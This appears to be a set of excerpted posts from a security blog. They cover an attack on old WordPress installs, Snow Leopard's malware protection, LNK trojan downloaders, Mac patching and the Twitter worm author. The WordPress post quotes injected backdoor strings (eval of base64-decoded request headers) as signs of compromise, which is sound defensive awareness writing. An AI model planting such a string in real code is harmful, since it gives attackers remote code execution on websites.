iThreats

It’s really tedious job to update and perhaps, patching from time to time. I should say, security comes with a great responsibility just like parking your car in a right place or locking your valuable computer when leaving.

Last week, users using older version of WordPress noticed unusual strings added to their blogs permalinks which makes a blog post link don’t work.

journeyetc.com responded and describe the attack:

“If you use wordpress, you should check ASAP your blog’s permalinks/rss feed.
If they are broken and look like this
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ for your feed
then you are the victim of the new hack attempt targeting our blogs.”

Affected users now faces the dilemma of upgrading and cleaning-up. The SQL injection attack leaves a backdoor in which even upgrading, may allow remote attacker to get in.  I recommend further reading to this post, “Old WordPress versions under attack” by Lorelle.

A very good information about Snow Leopard malware protection, its capability and limitation: 

Snow Leopard malware protection system: What does XProtect do?

An interesting news (it’s now all over the net) – Snow Leopard includes malware protection that detects two known threats, RSPlug and iServices. (Intego first spotted this anti-malware feature.)

Now curious thoughts buzzing around, many suspects that Apple is using ClamAV although Ryan Naraine @ zdnet blog had confirmed that Apple is not using it. Others suggest that it might be using Symantec’s engine, because of the naming convention used “OSX.RSPlug.A, OSX.iService.A”.

Anyway, in a perspective, it seems Apple is taking no chances with emerging and prevalent threats in Mac (as noted in recent changes). It is taking steps forward to deliver protection and exercise due care – which is good.

“Due care is care that a reasonable man would exercise under the circumstances”

At the end of the day, security is a process, which lives and deals with reality – our day to day computing activities.

Security researches, findings and awareness provides avenue for a better understanding of these (impending) attacks or threats.

I love reading emails especially when with background =) 

If you just double click it, then you are not infected. However, if you follow and successfully finish the installation process. Then, you are definitely infected!

Figure 01 – LNK Top Level File Structure

A computer shortcut (shortcut) is a small file containing a target URI or the name of a target program file that the shortcut represents. [wiki]

Microsoft Windows uses .lnk as the filename extension for shortcuts to local files, and .URL for shortcuts to remote files, like web pages.

Thanks to Jesse Hager for creating the specification document. Please refer this link http://www.wotsit.org/list.asp?al=L and search ‘LNK’ download good reference.

As observed, LNK trojan downloaders takes advantage of Command line string to perform malicious activity.

**Update**

0day on malformed Windows Shell Link (.LNK) Binary referred as CVE-2010-2568 and Microsoft Security Advisory (2286198)

LNK binary file format reference:

LNK_The_Windows_Shortcut_File_Format

MS-SHLLINK

If you haven’t patch yet, then please do.

How do I know if I’m patched?

Click “About This Mac” and it should display Mac OS X version 10.5.7. You can do the same if you are using Safari by clicking “About Safari”,  this should display Safari 4 (beta).

Why it is important to patch?

There are critical vulnerabilities that could allow malicious user (hacker, malware)  to snoop and steal your information in background.  Let me sight examples from vulnerabilities that has captured media attention (so, it means many attackers are aware of this).

Safari RSS

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.6, Mac OS X Server v10.5.6

Solution: The critical issue has been addressed in Security Update 2009-001 for Mac users and Safari 3.2.2 for Windows.

Impact: Accessing a maliciously crafted feed: URL may lead to arbitrary code execution.

Attacker can easily craft URL and execute javascript – and this could expose your personal and sensitive information.

Disk Images

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6

Solution: The critical issue has been addressed in Security Update 2009-002

Impact: Mounting a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution.

This is very critical the fact that browser like Safari has enabled “Open safe files after downloading” by default. You can turn off  this option in Safari by following the instructions below:

1. Open Safari

2. Open “Preferences” under the “Safari” menu

3. Click on the “General” tab

4. Un-check the “Open ‘safe’ files after downloading” box

5. Close Safari’s preferences

Apple profiles series of companies that uses Mac and one of them is Twitter – profile title “Twitter. Triumph of humanity“.

It’s nice story although when you think of the recent series of successful attacks (Mikeyy worm and exposure of Twitter Admin Panel), you’ll probably react this way …

“Aha?!, Interesting!”

“I am aware of the attack and yes I am behind this attack.” said twitter worm author.  [Read BNO News]

It seems that the author is not happy with the scrutiny/critics and media attention he’s getting now since another variant was spotted again in-the-wild.

“This is what happens to media whores….”  [Seclist FD thread]

From today’s news “Twitter worm author gets a job at exqSoft Solutions“

We often heard this kind of news from celebrities (hollywood stars, sports and social networks like youtube) but not for people commiting cyber crime. This is an alarming trend.

I’ve immediately searched if there’s a psychology research on this area, and here’s interesting info I’ve got:

“adolescents engage in bad behaviour because they find benefits — such as the immediate gratification of peer acceptance — are worth the risks.”  as published in journal Psychological Science.

No doubt, the 17 yrs old Twitter worm/spreader author landed a job. 

In Information Security this is absolutely not acceptable. Imagine an additional attack vector coming from this stream?

I was walking and looking around in an art gallery when fond thoughts came in - I was starring and imagining what if I am in a gallery of  malware digital art collection.  That would be sweet!  A researcher becoming artist by creating visual arts from the virus code.

Interestingly, this week Symantec’s MessageLabs will showcase 20 digital malware snapshot/pictures as part of 2009 RSA Conference.  It seems that my fond thoughts wasn’t far from reality.

More images/info published @ http://www.eweek.com/c/a/Security/Symantec-Showcases-Digital-Malware-Snapshots-for-2009-RSA-Conference-164639/